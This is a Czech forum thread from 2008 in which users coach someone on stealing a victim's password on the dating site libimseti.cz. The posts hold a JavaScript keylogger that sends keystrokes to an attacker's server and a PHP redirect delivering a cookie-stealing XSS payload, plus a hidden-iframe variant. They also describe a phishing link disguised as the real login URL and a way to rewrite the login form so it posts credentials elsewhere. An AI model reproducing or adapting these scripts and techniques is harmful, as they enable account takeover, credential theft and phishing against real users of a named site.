| Amater | 90.176.131.* | 23.6.2008 18:08 | # |
| Pomocí Javascriptu by bylo možné spustit keylogger, který by v daném okně zachytával všechny stisknuté klávesy a logy by odesílal prostřednictvím parametrů v URI na útočníkův server.... našeljsem script na to ale nevyznam se v něm????? jak to předělam na libimseti.cz
<script>
function sendkeylog (keylog) {
if (window.ActiveXObject) {
httpRequest = new ActiveXObject("Microsoft.XMLHTTP");
}
else {
httpRequest = new XMLHttpRequest();
}
httpRequest.open("GET", "[link]"+keylog, true);
httpRequest.send(null);
}
function savekeycode (e) {
keylog+=String.fromCharCode(e.charCode);
if ((keylog.length==5)||(e.keyCode==13)) {
sendkeylog(keylog);
keylog="";
}
}
keylog="";
document.onkeypress=savekeycode;
</script>
|
|
| Petrof_ | 213.192.3.* | 23.6.2008 9:42 | # |
| | DjH: nj, to by slo, ale on chce heslo. Tky by byla moznost pomoci js prepsat obsah stranky na "prosim prihlaste se" a vlastnost action prihlasovaciho formulare zmenit na svuj web, kde by se budto jen provedlo presmerovani, nebo opravdove prihlaseni aby to nebylo napadny. |
|
DjH |  |  |  319-960-895 | 23.6.2008 7:14 | # |
| Heh tak to je jednoduchy, pokud je to XSS v URL, tak udelej v php skript:
<?php
header("Location: http://libimseti.cz/neco.php?neco=<script>ukradnoutCookies(); </script>");
die();
?>
dej ho treba na http://mojestranky.xf.cz/index.php a poslu mi URL http://mojestranky.xf.cz. On na to klikne, presmeruje ho to na Libko a ukradne hesla, anebo jeste jinak, dej to do toho index.php na svych strankach ale do <iframe style="display: none" src="Location: http://libimseti.cz/neco.php?neco=<script>ukradnoutCookies(); </script>"></iframe>
---
Ad: priklady pujdou pouze pokud je na libku obet prihlasena.. to je asi tak vse
----------
..:@]> [link] <[@:.. |
|
| Amater | 90.176.131.* | 22.6.2008 23:16 | # |
| Myslíte že se dá na libimseti udělat krádež hesla z formuláře
pomocí AJAXu???
Už sem našel chybu přes xss :) ale co dál??? |
|
| Amater | 90.176.131.* | 22.6.2008 21:37 | # |
| | DjH: no ale mě právě o mail vubec nejde to sem zkoušel před rokem :) ale dík za radu |
|
| DjH|logout | 88.101.125.* | 22.6.2008 15:05 | # |
| Amater: jestli myslíš "klikatelný odkaz" v mailu, dělá se to tak, že pošleš e-mail v HTML a ne v textu, a potom už jednoduše uděláš "fake" odkaz třeba
<a href="http://muj.falesny.hosting.cz/login.php">
http://libimseti.cz/login.php
</a>
(nevim kde maji prihlasovani a je mi to jedno, na takovy weby nechodim x)), no a jemu se zobrazi "klikatelný odkaz" s textem http://libimseti.cz/login.php a když na to klikne, hodí ho to na http://muj.falesny.hosting.cz/login.php. =) |
|
| Amater | 90.176.131.* | 22.6.2008 13:15 | # |
| | No tak se asi dlouho budu učit xss a pečlivě studovat :) a for gumaaa- jo neumím poslat klikatelný odkaz... proto se radím s vámi kteří jste v tomto oboru větší odborníci než já a jestly znáš odkaz kde najdu jak se dělá klikatelný odkaz budu ti vděčnej :) |
|
| gugumaa | 195.113.79.10/10.0.10.* | 22.6.2008 12:35 | # |
| | Myslím, že mu to bude k ničemu, když ani neumí poslat klikatelný odkaz... Ví vůbec, co je to html? |
|
| nefim | 64.182.159.* | 22.6.2008 11:32 | # |
| Amater: nasel sem tenhle odkaz v guglu [link]
Snad ti pomuze |
|
| C X | 82.113.53.* | 22.6.2008 10:28 | # |
| | Amater: hledej XSS a CSRF ale pochybuji že něco najdeš na takhle velkém serveru... |
|
